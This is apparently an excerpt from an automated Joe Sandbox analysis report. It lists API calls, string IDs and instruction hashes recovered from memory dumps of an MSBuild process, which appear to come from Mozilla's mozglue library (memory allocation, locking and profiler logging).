                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$moz_xmalloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3009372454-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1192971331-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8BD9DB), ref: 6C8BF2D2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C8BF2F5
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C8BF386
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C8BF347
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C8BF3C8
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6C8BF3F3
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000), ref: 6C8BF3FC
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,00000000), ref: 6C8BF413
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: freemoz_xmalloc$HandleModule$malloc
                                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                                      • API String ID: 301460908-2227199552
                                                                                                                                                                                                                      • Opcode ID: 2003680df4a19c655f5bb94941963ba30b2a4a908cbf9cbc8b428950cf7259c9
                                                                                                                                                                                                                      • Instruction ID: aea0c58faf8c4345ddb3a49d4e1dc729a520da53e1af9607ec9acbba64d17a56
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2003680df4a19c655f5bb94941963ba30b2a4a908cbf9cbc8b428950cf7259c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E94136B9B047048BDB248F68DA4079EB7B0FF59758F20483DD81AA7B81EB31A549C784
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C899675
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C899697
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8996E8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C899707
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89971F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899773
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8997B7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997D0
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997EB
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899824
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 409848716-3880535382
                                                                                                                                                                                                                      • Opcode ID: 15f4eab077848a6e3d143faca9aa7ab751a5a53310f067c8608d5198abf32d80
                                                                                                                                                                                                                      • Instruction ID: 72bbbf6e3e2f48db51531bbcc69f85b65a8c0528017b51d1d63f218e930a768f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f4eab077848a6e3d143faca9aa7ab751a5a53310f067c8608d5198abf32d80
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB41A275704205AFDF10CFACD984A9A77B8FB8A759F20492CED1997740D730E914CBA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C881EC1
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C881EE1
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744), ref: 6C881F38
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744), ref: 6C881F5C
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C881F83
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C881FC0
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C881FE2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C881FF6
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C882019
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 2055633661-2608361144
                                                                                                                                                                                                                      • Opcode ID: 465e4a12169e50369b383f93400644e93c7bd62264f6e35ce71b96ec234c2109
                                                                                                                                                                                                                      • Instruction ID: 6c80d5363eee721ae9158e9b0afd22a93f2dc8da55994ecac23024b831285b44
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 465e4a12169e50369b383f93400644e93c7bd62264f6e35ce71b96ec234c2109
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B541D371B063198FDB109F68C988B6F76B5EF49749F10043DE96597B41DB70D8048BD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6C8E6009
                                                                                                                                                                                                                      • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C8E6024
                                                                                                                                                                                                                      • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C88EE51,?), ref: 6C8E6046
                                                                                                                                                                                                                      • OutputDebugStringA.KERNEL32(?,6C88EE51,?), ref: 6C8E6061
                                                                                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C8E6069
                                                                                                                                                                                                                      • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E6073
                                                                                                                                                                                                                      • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E6082
                                                                                                                                                                                                                      • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C90148E), ref: 6C8E6091
                                                                                                                                                                                                                      • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C88EE51,00000000,?), ref: 6C8E60BA
                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8E60C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3835517998-0
                                                                                                                                                                                                                      • Opcode ID: 6784d730f34e9bb5e73de8623dd681363aa8a80a72e784579a51dd547f6895bb
                                                                                                                                                                                                                      • Instruction ID: afebd566703be5228e8d9b814d9a3652f013cd8f9af56c83524eddfe7c91d65e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6784d730f34e9bb5e73de8623dd681363aa8a80a72e784579a51dd547f6895bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F21E571B002189FDF206F28DC08AAE7BB8FF45218F10882CE95AA7241DB74A559CFD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0039
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8D0041
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8D0075
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D0082
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000048), ref: 6C8D0090
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8D0104
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8D011B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C8D005B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                                                                                      • API String ID: 3012294017-637075127
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C897EA7
                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6C897EB3
                                                                                                                                                                                                                        • Part of subcall function 6C89CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C89CB49
                                                                                                                                                                                                                        • Part of subcall function 6C89CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C89CBB6
                                                                                                                                                                                                                      • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C897EC4
                                                                                                                                                                                                                      • mozalloc_abort.MOZGLUE(?), ref: 6C897F19
                                                                                                                                                                                                                      • malloc.MOZGLUE(?), ref: 6C897F36
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C897F4D
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                                      • API String ID: 204725295-2564639436
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C893CCC), ref: 6C893EEE
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C893FDC
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C893CCC), ref: 6C894006
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C8940A1
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C893CCC), ref: 6C8940AF
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C893CCC), ref: 6C8940C2
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C894134
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C893CCC), ref: 6C894143
                                                                                                                                                                                                                      • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C893CCC), ref: 6C894157
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3680524765-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,6C8A3F47,?,?,?,6C8A3F47,6C8A1A70,?), ref: 6C88207F
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,000000E5,6C8A3F47,?,6C8A3F47,6C8A1A70,?), ref: 6C8820DD
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C8A3F47,6C8A1A70,?), ref: 6C88211A
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744,?,6C8A3F47,6C8A1A70,?), ref: 6C882145
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C8A3F47,6C8A1A70,?), ref: 6C8821BA
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E744,?,6C8A3F47,6C8A1A70,?), ref: 6C8821E0
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E744,?,6C8A3F47,6C8A1A70,?), ref: 6C882232
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                                                                      • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                                                                      • API String ID: 889484744-884734703
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C8C483A,?), ref: 6C884ACB
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C8C483A,?), ref: 6C884AE0
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(FFFE15BF,?,6C8C483A,?), ref: 6C884A82
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C8C483A,?), ref: 6C884A97
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(15D4E801,?,6C8C483A,?), ref: 6C884A35
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C8C483A,?), ref: 6C884A4A
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(15D4E824,?,6C8C483A,?), ref: 6C884AF4
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(FFFE15E2,?,6C8C483A,?), ref: 6C884B10
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(8E8E0022,?,6C8C483A,?), ref: 6C884B2C
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4251373892-0
                                                                                                                                                                                                                      • Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                      • Instruction ID: 85dc02059fff959818b608c6157b9a84c7a7eba6f28a8cc8e177553f3710959b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93715DB19017069FC724CF68C5905AAB7F9FF88308B504A3ED15A9BB51E731F655CB80
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D8273), ref: 6C8D9D65
                                                                                                                                                                                                                      • free.MOZGLUE(6C8D8273,?), ref: 6C8D9D7C
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8D9D92
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8D9E0F
                                                                                                                                                                                                                      • free.MOZGLUE(6C8D946B,?,?), ref: 6C8D9E24
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?), ref: 6C8D9E3A
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8D9EC8
                                                                                                                                                                                                                      • free.MOZGLUE(6C8D946B,?,?,?), ref: 6C8D9EDF
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?), ref: 6C8D9EF5
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 956590011-0
                                                                                                                                                                                                                      • Opcode ID: 7ed78bb7a8c3b257c3c15df171baec3993e8e158f811a0a7f90b9a13c8347159
                                                                                                                                                                                                                      • Instruction ID: 3d64dc803a444578b0cbeb6f38e1f684ee1cf2c94c0efff65355ac815b1ea38f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ed78bb7a8c3b257c3c15df171baec3993e8e158f811a0a7f90b9a13c8347159
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 76719E70909B419BC722CF58C69055AF3F4FF99325B459A19E84A9B701EB30F8C5CB81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C8DDDCF
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8BFA4B
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D90FF
                                                                                                                                                                                                                        • Part of subcall function 6C8D90E0: free.MOZGLUE(?,00000000,?,?,6C8DDEDB), ref: 6C8D9108
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDE0D
                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C8DDE41
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDE5F
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDEA3
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8DDEE9
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C8CDEFD,?,6C894A68), ref: 6C8DDF32
                                                                                                                                                                                                                        • Part of subcall function 6C8DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8DDB86
                                                                                                                                                                                                                        • Part of subcall function 6C8DDAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C8DDC0E
                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C8CDEFD,?,6C894A68), ref: 6C8DDF65
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8DDF80
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 112305417-0
                                                                                                                                                                                                                      • Opcode ID: 2a727cf1aa309576e65a6f8070f8df8b3b968290643ee1341919ee823da0167f
                                                                                                                                                                                                                      • Instruction ID: e41d52fa1c225f900196e5b130ed1bc0fa0ce027b90f44894d436b81c1ee95d2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a727cf1aa309576e65a6f8070f8df8b3b968290643ee1341919ee823da0167f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F51B7727017119BD7309B28DA806AEB372AF91318F974D2ED41A53B00D731F959CFA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D32
                                                                                                                                                                                                                      • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C8E5C8C,?,6C8BE829), ref: 6C8E5D62
